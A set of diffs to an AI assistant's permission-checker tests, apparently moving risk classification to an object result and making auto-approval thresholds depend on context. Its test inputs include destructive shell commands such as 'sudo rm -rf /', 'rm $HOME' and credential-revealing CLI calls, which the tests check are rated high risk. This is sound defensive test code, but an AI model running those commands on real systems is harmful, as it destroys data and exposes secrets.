@@ -2290,19 +2325,19 @@ describe("Permission Checker", () => {
         "executor.ts",
       );
       const risk = await classifyRisk("host_file_write", { path: skillPath });
-      expect(risk).toBe(RiskLevel.High);
+      expect(risk.level).toBe(RiskLevel.High);
     });
 
     test("file_write to non-skill path is Low risk", async () => {
       const normalPath = "/tmp/some-file.txt";
       const risk = await classifyRisk("file_write", { path: normalPath });
-      expect(risk).toBe(RiskLevel.Low);
+      expect(risk.level).toBe(RiskLevel.Low);
     });
 
     test("file_edit of non-skill path is Low risk", async () => {
       const normalPath = "/tmp/some-file.txt";
       const risk = await classifyRisk("file_edit", { path: normalPath });
-      expect(risk).toBe(RiskLevel.Low);
+      expect(risk.level).toBe(RiskLevel.Low);
     });
 
     test("file_write to hooks directory is High risk", async () => {
@@ -2314,14 +2349,14 @@ describe("Permission Checker", () => {
         "hook.sh",
       );
       const risk = await classifyRisk("file_write", { path: hookPath });
-      expect(risk).toBe(RiskLevel.High);
+      expect(risk.level).toBe(RiskLevel.High);
     });
 
     test("file_edit of hooks config is High risk", async () => {
       ensureHooksDir();
       const configPath = join(checkerTestDir, "hooks", "config.json");
       const risk = await classifyRisk("file_edit", { path: configPath });
-      expect(risk).toBe(RiskLevel.High);
+      expect(risk.level).toBe(RiskLevel.High);
     });
 
     test("file_write to hooks directory prompts as High risk", async () => {
@@ -2345,26 +2380,26 @@ describe("Permission Checker", () => {
         "hook.sh",
       );
       const risk = await classifyRisk("host_file_write", { path: hookPath });
-      expect(risk).toBe(RiskLevel.High);
+      expect(risk.level).toBe(RiskLevel.High);
     });
 
     test("host_file_edit of hooks config is High risk", async () => {
       ensureHooksDir();
       const configPath = join(checkerTestDir, "hooks", "config.json");
       const risk = await classifyRisk("host_file_edit", { path: configPath });
-      expect(risk).toBe(RiskLevel.High);
+      expect(risk.level).toBe(RiskLevel.High);
     });
 
     test("host_file_write to non-skill path remains Medium risk (via registry)", async () => {
       const normalPath = "/tmp/some-file.txt";
       const risk = await classifyRisk("host_file_write", { path: normalPath });
-      expect(risk).toBe(RiskLevel.Medium);
+      expect(risk.level).toBe(RiskLevel.Medium);
     });
 
     test("host_file_edit of non-skill path remains Medium risk (via registry)", async () => {
       const normalPath = "/tmp/some-file.txt";
       const risk = await classifyRisk("host_file_edit", { path: normalPath });
-      expect(risk).toBe(RiskLevel.Medium);
+      expect(risk.level).toBe(RiskLevel.Medium);
     });
   });
 
@@ -3984,7 +4019,7 @@ describe("Permission Checker", () => {
           "executor.ts",
         );
         const risk = await classifyRisk("file_write", { path: skillPath });
-        expect(risk).toBe(RiskLevel.High);
+        expect(risk.level).toBe(RiskLevel.High);
       });
 
       test("file_edit of skill file is classified as High risk", async () => {
@@ -3996,7 +4031,7 @@ describe("Permission Checker", () => {
           "SKILL.md",
         );
         const risk = await classifyRisk("file_edit", { path: skillPath });
-        expect(risk).toBe(RiskLevel.High);
+        expect(risk.level).toBe(RiskLevel.High);
       });
 
       test("host_file_write to skill directory is classified as High risk", async () => {
@@ -4008,7 +4043,7 @@ describe("Permission Checker", () => {
           "executor.ts",
         );
         const risk = await classifyRisk("host_file_write", { path: skillPath });
-        expect(risk).toBe(RiskLevel.High);
+        expect(risk.level).toBe(RiskLevel.High);
       });
 
       test("host_file_edit of skill file is classified as High risk", async () => {
@@ -4020,7 +4055,7 @@ describe("Permission Checker", () => {
           "SKILL.md",
         );
         const risk = await classifyRisk("host_file_edit", { path: skillPath });
-        expect(risk).toBe(RiskLevel.High);
+        expect(risk.level).toBe(RiskLevel.High);
       });
 
       test("file_read of skill file remains Low risk (reads not escalated)", async () => {
@@ -4032,7 +4067,7 @@ describe("Permission Checker", () => {
           "TOOLS.json",
         );
         const risk = await classifyRisk("file_read", { path: skillPath });
-        expect(risk).toBe(RiskLevel.Low);
+        expect(risk.level).toBe(RiskLevel.Low);
       });
 
       test("generic allow rule cannot bypass high-risk skill mutation prompt", async () => {
@@ -4177,7 +4212,7 @@ describe("Permission Checker", () => {
           { path: join(extraSkillDir, "my-skill", "foo.ts") },
           "/tmp",
         );
-        expect(risk).toBe(RiskLevel.High);
+        expect(risk.level).toBe(RiskLevel.High);
       }),
     );
 
@@ -4189,7 +4224,7 @@ describe("Permission Checker", () => {
           { path: join(extraSkillDir, "my-skill", "SKILL.md") },
           "/tmp",
         );
-        expect(risk).toBe(RiskLevel.High);
+        expect(risk.level).toBe(RiskLevel.High);
       }),
     );
 
@@ -4199,7 +4234,7 @@ describe("Permission Checker", () => {
         const risk = await classifyRisk("host_file_write", {
           path: join(extraSkillDir, "my-skill", "executor.ts"),
         });
-        expect(risk).toBe(RiskLevel.High);
+        expect(risk.level).toBe(RiskLevel.High);
       }),
     );
 
@@ -4209,7 +4244,7 @@ describe("Permission Checker", () => {
         const risk = await classifyRisk("host_file_edit", {
           path: join(extraSkillDir, "my-skill", "SKILL.md"),
         });
-        expect(risk).toBe(RiskLevel.High);
+        expect(risk.level).toBe(RiskLevel.High);
       }),
     );
 
@@ -4221,7 +4256,7 @@ describe("Permission Checker", () => {
           { path: "/tmp/unrelated.txt" },
           "/tmp",
         );
-        expect(risk).toBe(RiskLevel.Low);
+        expect(risk.level).toBe(RiskLevel.Low);
       }),
     );
 
@@ -4445,7 +4480,7 @@ describe("bash network_mode=proxied — risk capped at medium", () => {
       command: "cat exploit.py | python3",
       network_mode: "proxied",
     });
-    expect(risk).toBe(RiskLevel.Medium);
+    expect(risk.level).toBe(RiskLevel.Medium);
   });
 
   test("pipe to python3 -c is high risk (registry: python3 executes arbitrary code)", async () => {
@@ -4455,14 +4490,14 @@ describe("bash network_mode=proxied — risk capped at medium", () => {
       command:
         'cat data.json | python3 -c "import sys; print(sys.stdin.read())"',
     });
-    expect(risk).toBe(RiskLevel.High);
+    expect(risk.level).toBe(RiskLevel.High);
   });
 
   test("pipe to python3 without -c is high risk (stdin exec)", async () => {
     const risk = await classifyRisk("bash", {
       command: "cat exploit.py | python3",
     });
-    expect(risk).toBe(RiskLevel.High);
+    expect(risk.level).toBe(RiskLevel.High);
   });
 
   test("proxied bash with high-risk command prompts (medium risk cap, no default allow rule)", async () => {
@@ -4567,7 +4602,7 @@ describe("computer-use tool permission defaults", () => {
       const risk = await classifyRisk(name, {});
       // CU tools are proxy tools with RiskLevel.Low, but classifyRisk looks them up
       // in the registry. In workspace mode, Low risk tools are auto-allowed.
-      expect(risk).toBe(RiskLevel.Low);
+      expect(risk.level).toBe(RiskLevel.Low);
     }
   });
 });

--- a/assistant/src/__tests__/checker.test.ts
+++ b/assistant/src/__tests__/checker.test.ts
@@ -748,7 +748,7 @@ describe("Permission Checker", () => {
       // Low risk → auto-allowed via risk-based fallback
       const low = await check("bash", { command: "ls" }, "/tmp");
       expect(low.decision).toBe("allow");
-      expect(low.reason).toContain("low risk");
+      expect(low.reason).toContain("Low risk");
     });
 
     test("host_bash high risk → always prompt", async () => {
@@ -795,7 +795,7 @@ describe("Permission Checker", () => {
       addRule("bash", "rm *", "/tmp");
       const result = await check("bash", { command: "rm file.txt" }, "/tmp");
       expect(result.decision).toBe("prompt");
-      expect(result.reason).toContain("high risk");
+      expect(result.reason).toContain("High risk");
     });
 
     test("file_read → auto-allow", async () => {
@@ -1122,7 +1122,7 @@ describe("Permission Checker", () => {
       addRule("bash", "sudo *", "everywhere");
       const result = await check("bash", { command: "sudo rm -rf /" }, "/tmp");
       expect(result.decision).toBe("prompt");
-      expect(result.reason).toContain("high risk");
+      expect(result.reason).toContain("High risk");
     });
 
     // Deny rule tests
@@ -2681,7 +2681,7 @@ describe("Permission Checker", () => {
       addRule("bash", "sudo *", "everywhere", "allow");
       const result = await check("bash", { command: "sudo rm -rf /" }, "/tmp");
       expect(result.decision).toBe("prompt");
-      expect(result.reason).toContain("high risk");
+      expect(result.reason).toContain("High risk");
     });
   });
 
@@ -2692,7 +2692,7 @@ describe("Permission Checker", () => {
       addRule("bash", "kill *", "everywhere", "allow", 2000);
       const result = await check("bash", { command: "kill -9 1234" }, "/tmp");
       expect(result.decision).toBe("prompt");
-      expect(result.reason).toContain("high risk");
+      expect(result.reason).toContain("High risk");
     });
 
     test("high-risk bash with allow rule in containerized environment auto-allows", async () => {
@@ -2815,7 +2815,7 @@ describe("Permission Checker", () => {
       addRule("bash", "kill *", "everywhere", "allow", 2000);
       const result = await check("bash", { command: "kill -9 1234" }, "/tmp");
       expect(result.decision).toBe("prompt");
-      expect(result.reason).toContain("high risk");
+      expect(result.reason).toContain("High risk");
     });
 
     test("strict mode: medium-risk with matching allow rule auto-allows", async () => {
@@ -4830,7 +4830,7 @@ describe("workspace mode — auto-allow workspace-scoped operations", () => {
     expect(result.decision).toBe("allow");
     // Not auto-allowed via workspace mode — bash falls through to risk-based policy
     expect(result.reason).not.toContain("Workspace mode");
-    expect(result.reason).toContain("low risk");
+    expect(result.reason).toContain("Low risk");
   });
 
   test("bash in workspace (medium risk) → prompt (not auto-allowed)", async () => {

--- a/assistant/src/__tests__/cli-command-risk-guard.test.ts
+++ b/assistant/src/__tests__/cli-command-risk-guard.test.ts
@@ -32,6 +32,7 @@ mock.module("../config/loader.js", () => ({
 }));
 
 import { buildCliProgram } from "../cli/program.js";
+import type { RiskClassification } from "../permissions/checker.js";
 import { classifyRisk } from "../permissions/checker.js";
 import { RiskLevel } from "../permissions/types.js";
 
@@ -39,17 +40,17 @@ import { RiskLevel } from "../permissions/types.js";
  * Assert that a command classifies as Low risk, with a descriptive failure
  * message that guides developers toward the correct fix.
  */
-function expectLowRisk(command: string, actual: RiskLevel): void {
-  if (actual !== RiskLevel.Low) {
+function expectLowRisk(command: string, actual: RiskClassification): void {
+  if (actual.level !== RiskLevel.Low) {
     throw new Error(
-      `"${command}" classified as ${actual} instead of Low. ` +
+      `"${command}" classified as ${actual.level} instead of Low. ` +
         `assistant CLI commands must be Low risk by default — the assistant ` +
         `uses its own CLI during normal operation. If you need risk ` +
         `escalation for specific subcommands, add them to the elevated ` +
         `risk tests in this guard test with justification.`,
     );
   }
-  expect(actual).toBe(RiskLevel.Low);
+  expect(actual.level).toBe(RiskLevel.Low);
 }
 
 // Dynamically extract subcommand names from the CLI program definition.
@@ -101,56 +102,56 @@ describe("CLI command risk guard: elevated assistant subcommands", () => {
     const risk = await classifyRisk("bash", {
       command: "assistant oauth token",
     });
-    expect(risk).toBe(RiskLevel.High);
+    expect(risk.level).toBe(RiskLevel.High);
   });
 
   test("assistant oauth mode --set is High risk (changes auth mode)", async () => {
     const risk = await classifyRisk("bash", {
       command: "assistant oauth mode --set managed",
     });
-    expect(risk).toBe(RiskLevel.High);
+    expect(risk.level).toBe(RiskLevel.High);
   });
 
   test("assistant oauth mode --set=value is High risk (equals syntax)", async () => {
     const risk = await classifyRisk("bash", {
       command: "assistant oauth mode google --set=managed",
     });
-    expect(risk).toBe(RiskLevel.High);
+    expect(risk.level).toBe(RiskLevel.High);
   });
 
   test("assistant oauth mode without --set is Low risk (read-only)", async () => {
     const risk = await classifyRisk("bash", {
       command: "assistant oauth mode",
     });
-    expect(risk).toBe(RiskLevel.Low);
+    expect(risk.level).toBe(RiskLevel.Low);
   });
 
   test("assistant credentials reveal is High risk (exposes secrets)", async () => {
     const risk = await classifyRisk("bash", {
       command: "assistant credentials reveal",
     });
-    expect(risk).toBe(RiskLevel.High);
+    expect(risk.level).toBe(RiskLevel.High);
   });
 
   test("assistant oauth request is Medium risk (initiates OAuth flow)", async () => {
     const risk = await classifyRisk("bash", {
       command: "assistant oauth request",
     });
-    expect(risk).toBe(RiskLevel.Medium);
+    expect(risk.level).toBe(RiskLevel.Medium);
   });
 
   test("assistant oauth connect is Medium risk (modifies OAuth connections)", async () => {
     const risk = await classifyRisk("bash", {
       command: "assistant oauth connect",
     });
-    expect(risk).toBe(RiskLevel.Medium);
+    expect(risk.level).toBe(RiskLevel.Medium);
   });
 
   test("assistant oauth disconnect is Medium risk (removes OAuth connections)", async () => {
     const risk = await classifyRisk("bash", {
       command: "assistant oauth disconnect",
     });
-    expect(risk).toBe(RiskLevel.Medium);
+    expect(risk.level).toBe(RiskLevel.Medium);
   });
 
   test("--help on non-elevated subcommands remains Low risk", async () => {
@@ -195,12 +196,12 @@ describe("CLI command risk guard: elevated assistant subcommands", () => {
     // THEN --help does not bypass the elevated risk level
     for (const command of highRiskWithHelp) {
       const risk = await classifyRisk("bash", { command });
-      expect(risk).toBe(RiskLevel.High);
+      expect(risk.level).toBe(RiskLevel.High);
     }
 
     for (const command of mediumRiskWithHelp) {
       const risk = await classifyRisk("bash", { command });
-      expect(risk).toBe(RiskLevel.Medium);
+      expect(risk.level).toBe(RiskLevel.Medium);
     }
   });
 
@@ -208,14 +209,14 @@ describe("CLI command risk guard: elevated assistant subcommands", () => {
     const risk = await classifyRisk("bash", {
       command: "assistant credentials reveal 123 --service --help",
     });
-    expect(risk).toBe(RiskLevel.High);
+    expect(risk.level).toBe(RiskLevel.High);
   });
 
   test("-h used as option value does not downgrade oauth mode --set risk", async () => {
     const risk = await classifyRisk("bash", {
       command: "assistant oauth mode --set -h",
     });
-    expect(risk).toBe(RiskLevel.High);
+    expect(risk.level).toBe(RiskLevel.High);
   });
 
   test("non-sensitive oauth subcommands remain Low risk", async () => {
@@ -248,28 +249,28 @@ describe("CLI command risk guard: elevated assistant subcommands", () => {
     const risk = await classifyRisk("bash", {
       command: "assistant credentials set",
     });
-    expect(risk).toBe(RiskLevel.High);
+    expect(risk.level).toBe(RiskLevel.High);
   });
 
   test("assistant credentials delete is High risk (removes stored credentials)", async () => {
     const risk = await classifyRisk("bash", {
       command: "assistant credentials delete",
     });
-    expect(risk).toBe(RiskLevel.High);
+    expect(risk.level).toBe(RiskLevel.High);
   });
 
   test("assistant keys set is High risk (modifies API keys)", async () => {
     const risk = await classifyRisk("bash", {
       command: "assistant keys set anthropic sk-ant-xxx",
     });
-    expect(risk).toBe(RiskLevel.High);
+    expect(risk.level).toBe(RiskLevel.High);
   });
 
   test("assistant keys delete is High risk (removes API keys)", async () => {
     const risk = await classifyRisk("bash", {
       command: "assistant keys delete openai",
     });
-    expect(risk).toBe(RiskLevel.High);
+    expect(risk.level).toBe(RiskLevel.High);
   });
 
   test("non-sensitive keys subcommands remain Low risk", async () => {
@@ -285,14 +286,14 @@ describe("CLI command risk guard: elevated assistant subcommands", () => {
     const risk = await classifyRisk("bash", {
       command: "assistant trust remove abc123",
     });
-    expect(risk).toBe(RiskLevel.High);
+    expect(risk.level).toBe(RiskLevel.High);
   });
 
   test("assistant trust clear is High risk (clears all trust rules)", async () => {
     const risk = await classifyRisk("bash", {
       command: "assistant trust clear",
     });
-    expect(risk).toBe(RiskLevel.High);
+    expect(risk.level).toBe(RiskLevel.High);
   });
 
   test("non-sensitive trust subcommands remain Low risk", async () => {
@@ -310,35 +311,35 @@ describe("CLI command risk guard: wrapper program propagation", () => {
     const risk = await classifyRisk("bash", {
       command: "env assistant oauth token",
     });
-    expect(risk).toBe(RiskLevel.High);
+    expect(risk.level).toBe(RiskLevel.High);
   });
 
   test("nice assistant credentials reveal is High risk", async () => {
     const risk = await classifyRisk("bash", {
       command: "nice assistant credentials reveal",
     });
-    expect(risk).toBe(RiskLevel.High);
+    expect(risk.level).toBe(RiskLevel.High);
   });
 
   test("timeout 30 assistant oauth request is Medium risk", async () => {
     const risk = await classifyRisk("bash", {
       command: "timeout 30 assistant oauth request",
     });
-    expect(risk).toBe(RiskLevel.Medium);
+    expect(risk.level).toBe(RiskLevel.Medium);
   });
 
   test("timeout 30 assistant oauth token is High risk", async () => {
     const risk = await classifyRisk("bash", {
       command: "timeout 30 assistant oauth token",
     });
-    expect(risk).toBe(RiskLevel.High);
+    expect(risk.level).toBe(RiskLevel.High);
   });
 
   test("timeout 30 git push is Medium risk", async () => {
     const risk = await classifyRisk("bash", {
       command: "timeout 30 git push",
     });
-    expect(risk).toBe(RiskLevel.Medium);
+    expect(risk.level).toBe(RiskLevel.Medium);
   });
 
   test("timeout 30 git status is Low risk", async () => {
@@ -357,7 +358,7 @@ describe("CLI command risk guard: wrapper program propagation", () => {
 
   test("env git push is Medium risk (not Low)", async () => {
     const risk = await classifyRisk("bash", { command: "env git push" });
-    expect(risk).toBe(RiskLevel.Medium);
+    expect(risk.level).toBe(RiskLevel.Medium);
   });
 
   test("env git status is Low risk", async () => {

--- a/assistant/src/__tests__/config-schema.test.ts
+++ b/assistant/src/__tests__/config-schema.test.ts
@@ -675,7 +675,11 @@ describe("AssistantConfigSchema", () => {
     expect(result.permissions).toEqual({
       mode: "workspace",
       hostAccess: false,
-      autoApproveUpTo: "low",
+      autoApproveUpTo: {
+        conversation: "low",
+        background: "medium",
+        headless: "none",
+      },
     });
   });
 
@@ -712,11 +716,15 @@ describe("AssistantConfigSchema", () => {
     }
   });
 
-  test("defaults autoApproveUpTo to low when not specified", () => {
+  test("defaults autoApproveUpTo to per-context object when not specified", () => {
     const result = AssistantConfigSchema.parse({
       permissions: { mode: "workspace" },
     });
-    expect(result.permissions.autoApproveUpTo).toBe("low");
+    expect(result.permissions.autoApproveUpTo).toEqual({
+      conversation: "low",
+      background: "medium",
+      headless: "none",
+    });
   });
 
   test("accepts autoApproveUpTo none", () => {
@@ -2365,7 +2373,11 @@ describe("loadConfig with schema validation", () => {
     expect(config.permissions).toEqual({
       mode: "workspace",
       hostAccess: false,
-      autoApproveUpTo: "low",
+      autoApproveUpTo: {
+        conversation: "low",
+        background: "medium",
+        headless: "none",
+      },
     });
   });
 

--- a/assistant/src/__tests__/config-schema.test.ts
+++ b/assistant/src/__tests__/config-schema.test.ts
@@ -137,7 +137,11 @@ describe("AssistantConfigSchema", () => {
   test("accepts valid complete config", () => {
     const input = {
       llm: {
-        default: { provider: "openai" as const, model: "gpt-4", maxTokens: 4096 },
+        default: {
+          provider: "openai" as const,
+          model: "gpt-4",
+          maxTokens: 4096,
+        },
       },
       timeouts: {
         shellDefaultTimeoutSec: 30,
@@ -671,6 +675,7 @@ describe("AssistantConfigSchema", () => {
     expect(result.permissions).toEqual({
       mode: "workspace",
       hostAccess: false,
+      autoApproveUpTo: "low",
     });
   });
 
@@ -705,6 +710,57 @@ describe("AssistantConfigSchema", () => {
       const msgs = result.error.issues.map((i) => i.message);
       expect(msgs.some((m) => m.includes("permissions.mode"))).toBe(true);
     }
+  });
+
+  test("defaults autoApproveUpTo to low when not specified", () => {
+    const result = AssistantConfigSchema.parse({
+      permissions: { mode: "workspace" },
+    });
+    expect(result.permissions.autoApproveUpTo).toBe("low");
+  });
+
+  test("accepts autoApproveUpTo none", () => {
+    const result = AssistantConfigSchema.parse({
+      permissions: { autoApproveUpTo: "none" },
+    });
+    expect(result.permissions.autoApproveUpTo).toBe("none");
+  });
+
+  test("accepts autoApproveUpTo low", () => {
+    const result = AssistantConfigSchema.parse({
+      permissions: { autoApproveUpTo: "low" },
+    });
+    expect(result.permissions.autoApproveUpTo).toBe("low");
+  });
+
+  test("accepts autoApproveUpTo medium", () => {
+    const result = AssistantConfigSchema.parse({
+      permissions: { autoApproveUpTo: "medium" },
+    });
+    expect(result.permissions.autoApproveUpTo).toBe("medium");
+  });
+
+  test("rejects autoApproveUpTo high", () => {
+    const result = AssistantConfigSchema.safeParse({
+      permissions: { autoApproveUpTo: "high" },
+    });
+    expect(result.success).toBe(false);
+  });
+
+  test("rejects invalid autoApproveUpTo string", () => {
+    const result = AssistantConfigSchema.safeParse({
+      permissions: { autoApproveUpTo: "everything" },
+    });
+    expect(result.success).toBe(false);
+  });
+
+  test("autoApproveUpTo round-trips through JSON serialization", () => {
+    const original = AssistantConfigSchema.parse({
+      permissions: { autoApproveUpTo: "medium" },
+    });
+    const json = JSON.stringify(original);
+    const parsed = AssistantConfigSchema.parse(JSON.parse(json));
+    expect(parsed.permissions.autoApproveUpTo).toBe("medium");
   });
 
   test("applies workspaceGit defaults including interactiveGitTimeoutMs", () => {
@@ -2251,6 +2307,7 @@ describe("loadConfig with schema validation", () => {
     expect(config.permissions).toEqual({
       mode: "workspace",
       hostAccess: false,
+      autoApproveUpTo: "low",
     });
   });
 

--- a/assistant/src/__tests__/config-schema.test.ts
+++ b/assistant/src/__tests__/config-schema.test.ts
@@ -763,6 +763,64 @@ describe("AssistantConfigSchema", () => {
     expect(parsed.permissions.autoApproveUpTo).toBe("medium");
   });
 
+  test("accepts autoApproveUpTo as per-context object", () => {
+    const result = AssistantConfigSchema.parse({
+      permissions: {
+        autoApproveUpTo: {
+          conversation: "low",
+          background: "medium",
+          headless: "none",
+        },
+      },
+    });
+    expect(result.permissions.autoApproveUpTo).toEqual({
+      conversation: "low",
+      background: "medium",
+      headless: "none",
+    });
+  });
+
+  test("per-context object applies defaults for omitted keys", () => {
+    const result = AssistantConfigSchema.parse({
+      permissions: {
+        autoApproveUpTo: {},
+      },
+    });
+    expect(result.permissions.autoApproveUpTo).toEqual({
+      conversation: "low",
+      background: "medium",
+      headless: "none",
+    });
+  });
+
+  test("per-context object rejects invalid enum values", () => {
+    const result = AssistantConfigSchema.safeParse({
+      permissions: {
+        autoApproveUpTo: { conversation: "high" },
+      },
+    });
+    expect(result.success).toBe(false);
+  });
+
+  test("per-context object round-trips through JSON serialization", () => {
+    const original = AssistantConfigSchema.parse({
+      permissions: {
+        autoApproveUpTo: {
+          conversation: "none",
+          background: "low",
+          headless: "medium",
+        },
+      },
+    });
+    const json = JSON.stringify(original);
+    const parsed = AssistantConfigSchema.parse(JSON.parse(json));
+    expect(parsed.permissions.autoApproveUpTo).toEqual({
+      conversation: "none",
+      background: "low",
+      headless: "medium",
+    });
+  });
+
   test("applies workspaceGit defaults including interactiveGitTimeoutMs", () => {
     const result = AssistantConfigSchema.parse({});
     expect(result.workspaceGit).toEqual({

--- a/assistant/src/__tests__/conversation-attachments.test.ts
+++ b/assistant/src/__tests__/conversation-attachments.test.ts
@@ -32,7 +32,7 @@ const addRuleSpy = mock(() => {});
 
 mock.module("../permissions/checker.js", () => ({
   check: checkSpy,
-  classifyRisk: () => Promise.resolve("low"),
+  classifyRisk: () => Promise.resolve({ level: "low" }),
   generateAllowlistOptions: () => Promise.resolve([]),
   generateScopeOptions: () => [],
 }));

--- a/assistant/src/__tests__/permission-checker-host-gate.test.ts
+++ b/assistant/src/__tests__/permission-checker-host-gate.test.ts
@@ -30,7 +30,7 @@ import type {
 // ---------------------------------------------------------------------------
 
 mock.module("../permissions/checker.js", () => ({
-  classifyRisk: async () => RiskLevel.Low,
+  classifyRisk: async () => ({ level: RiskLevel.Low }),
   check: async () => ({ decision: "allow", reason: "" }),
   generateAllowlistOptions: async () => [],
   generateScopeOptions: () => [],

--- a/assistant/src/__tests__/permission-mode.test.ts
+++ b/assistant/src/__tests__/permission-mode.test.ts
@@ -40,7 +40,11 @@ describe("PermissionsConfigSchema", () => {
     expect(PermissionsConfigSchema.parse({})).toEqual({
       mode: "workspace",
       hostAccess: false,
-      autoApproveUpTo: "low",
+      autoApproveUpTo: {
+        conversation: "low",
+        background: "medium",
+        headless: "none",
+      },
     });
   });
 
@@ -48,7 +52,11 @@ describe("PermissionsConfigSchema", () => {
     expect(PermissionsConfigSchema.parse({ mode: "strict" })).toEqual({
       mode: "strict",
       hostAccess: false,
-      autoApproveUpTo: "low",
+      autoApproveUpTo: {
+        conversation: "low",
+        background: "medium",
+        headless: "none",
+      },
     });
   });
 
@@ -61,7 +69,11 @@ describe("PermissionsConfigSchema", () => {
     ).toEqual({
       mode: "workspace",
       hostAccess: true,
-      autoApproveUpTo: "low",
+      autoApproveUpTo: {
+        conversation: "low",
+        background: "medium",
+        headless: "none",
+      },
     });
   });
 

--- a/assistant/src/__tests__/permission-mode.test.ts
+++ b/assistant/src/__tests__/permission-mode.test.ts
@@ -40,6 +40,7 @@ describe("PermissionsConfigSchema", () => {
     expect(PermissionsConfigSchema.parse({})).toEqual({
       mode: "workspace",
       hostAccess: false,
+      autoApproveUpTo: "low",
     });
   });
 
@@ -47,6 +48,7 @@ describe("PermissionsConfigSchema", () => {
     expect(PermissionsConfigSchema.parse({ mode: "strict" })).toEqual({
       mode: "strict",
       hostAccess: false,
+      autoApproveUpTo: "low",
     });
   });
 
@@ -59,6 +61,7 @@ describe("PermissionsConfigSchema", () => {
     ).toEqual({
       mode: "workspace",
       hostAccess: true,
+      autoApproveUpTo: "low",
     });
   });
 
@@ -66,6 +69,7 @@ describe("PermissionsConfigSchema", () => {
     const input = {
       mode: "workspace" as const,
       hostAccess: true,
+      autoApproveUpTo: "low" as const,
     };
     const json = JSON.stringify(input);
     expect(PermissionsConfigSchema.parse(JSON.parse(json))).toEqual(input);

--- a/assistant/src/__tests__/platform-bash-auto-approve.test.ts
+++ b/assistant/src/__tests__/platform-bash-auto-approve.test.ts
@@ -87,7 +87,7 @@ mock.module("../util/logger.js", () => ({
 }));
 
 mock.module("../permissions/checker.js", () => ({
-  classifyRisk: async () => riskOverride,
+  classifyRisk: async () => ({ level: riskOverride }),
   check: async () => {
     if (checkResultOverride) return checkResultOverride;
     return { decision: "allow", reason: "allowed" };

--- a/assistant/src/__tests__/require-fresh-approval.test.ts
+++ b/assistant/src/__tests__/require-fresh-approval.test.ts
@@ -94,7 +94,7 @@ mock.module("../util/logger.js", () => ({
 }));
 
 mock.module("../permissions/checker.js", () => ({
-  classifyRisk: async () => riskOverride,
+  classifyRisk: async () => ({ level: riskOverride }),
   check: async () => {
     if (checkResultOverride) return checkResultOverride;
     return { decision: "allow", reason: "allowed" };

--- a/assistant/src/__tests__/risk-classifier-parity.test.ts
+++ b/assistant/src/__tests__/risk-classifier-parity.test.ts
@@ -146,7 +146,7 @@ describe("risk-classifier-parity", () => {
       const label = command || "(empty)";
       test(`"${label}" → ${expectedRisk}`, async () => {
         const result = await classifyRisk("bash", { command });
-        expect(result).toBe(expectedRisk);
+        expect(result.level).toBe(expectedRisk);
       });
     }
   });

--- a/assistant/src/__tests__/secret-scanner-executor.test.ts
+++ b/assistant/src/__tests__/secret-scanner-executor.test.ts
@@ -50,7 +50,7 @@ mock.module("../util/logger.js", () => ({
 }));
 
 mock.module("../permissions/checker.js", () => ({
-  classifyRisk: () => "low",
+  classifyRisk: () => ({ level: "low" }),
   check: () => ({ decision: "allow" }),
   generateAllowlistOptions: () => [],
   generateScopeOptions: () => [],

--- a/assistant/src/__tests__/shell-parser-property.test.ts
+++ b/assistant/src/__tests__/shell-parser-property.test.ts
@@ -68,7 +68,7 @@ describe("Shell parser property-based tests", () => {
           async (program, args) => {
             const command = [program, ...args].join(" ");
             const risk = await classifyRisk("bash", { command });
-            expect(risk).toBe(RiskLevel.High);
+            expect(risk.level).toBe(RiskLevel.High);
           },
         ),
         { numRuns: 200, ...FC_OPTS },
@@ -83,7 +83,7 @@ describe("Shell parser property-based tests", () => {
           async (flag, target) => {
             const command = `rm ${flag} ${target}`;
             const risk = await classifyRisk("bash", { command });
-            expect(risk).toBe(RiskLevel.High);
+            expect(risk.level).toBe(RiskLevel.High);
           },
         ),
         { numRuns: 100, ...FC_OPTS },
@@ -95,7 +95,7 @@ describe("Shell parser property-based tests", () => {
         fc.asyncProperty(fc.constantFrom("/", "~", "$HOME"), async (target) => {
           const command = `rm ${target}`;
           const risk = await classifyRisk("bash", { command });
-          expect(risk).toBe(RiskLevel.High);
+          expect(risk.level).toBe(RiskLevel.High);
         }),
         { numRuns: 10, ...FC_OPTS },
       );
@@ -112,7 +112,7 @@ describe("Shell parser property-based tests", () => {
           async (program, args) => {
             const command = ["sudo", program, ...args].join(" ");
             const risk = await classifyRisk("bash", { command });
-            expect(risk).toBe(RiskLevel.High);
+            expect(risk.level).toBe(RiskLevel.High);
           },
         ),
         { numRuns: 100, ...FC_OPTS },
@@ -133,7 +133,7 @@ describe("Shell parser property-based tests", () => {
             const args = kvPairs.map(([k, v]) => `${k}=${v}`);
             const command = ["dd", ...args].join(" ");
             const risk = await classifyRisk("bash", { command });
-            expect(risk).toBe(RiskLevel.High);
+            expect(risk.level).toBe(RiskLevel.High);
           },
         ),
         { numRuns: 50, ...FC_OPTS },
@@ -180,7 +180,7 @@ describe("Shell parser property-based tests", () => {
           async (program, args) => {
             const command = [program, ...args].join(" ");
             const risk = await classifyRisk("bash", { command });
-            expect(risk).toBe(RiskLevel.Low);
+            expect(risk.level).toBe(RiskLevel.Low);
           },
         ),
         { numRuns: 200, ...FC_OPTS },
@@ -208,7 +208,7 @@ describe("Shell parser property-based tests", () => {
           async (subcommand) => {
             const command = `git ${subcommand}`;
             const risk = await classifyRisk("bash", { command });
-            expect(risk).toBe(RiskLevel.Low);
+            expect(risk.level).toBe(RiskLevel.Low);
           },
         ),
         { numRuns: 100, ...FC_OPTS },
@@ -227,7 +227,7 @@ describe("Shell parser property-based tests", () => {
           async (safe, dangerous) => {
             const command = `${safe} something | ${dangerous}`;
             const risk = await classifyRisk("bash", { command });
-            expect(risk).toBe(RiskLevel.High);
+            expect(risk.level).toBe(RiskLevel.High);
           },
         ),
         { numRuns: 50, ...FC_OPTS },
@@ -242,7 +242,7 @@ describe("Shell parser property-based tests", () => {
           async (safe, dangerous) => {
             const command = `${safe} && ${dangerous}`;
             const risk = await classifyRisk("bash", { command });
-            expect(risk).toBe(RiskLevel.High);
+            expect(risk.level).toBe(RiskLevel.High);
           },
         ),
         { numRuns: 50, ...FC_OPTS },
@@ -289,7 +289,7 @@ describe("Shell parser property-based tests", () => {
           async (commands) => {
             const command = commands.join(" | ");
             const risk = await classifyRisk("bash", { command });
-            expect(risk).toBe(RiskLevel.Low);
+            expect(risk.level).toBe(RiskLevel.Low);
           },
         ),
         { numRuns: 100, ...FC_OPTS },
@@ -340,7 +340,7 @@ describe("Shell parser property-based tests", () => {
           async (input) => {
             const risk = await classifyRisk("bash", { command: input });
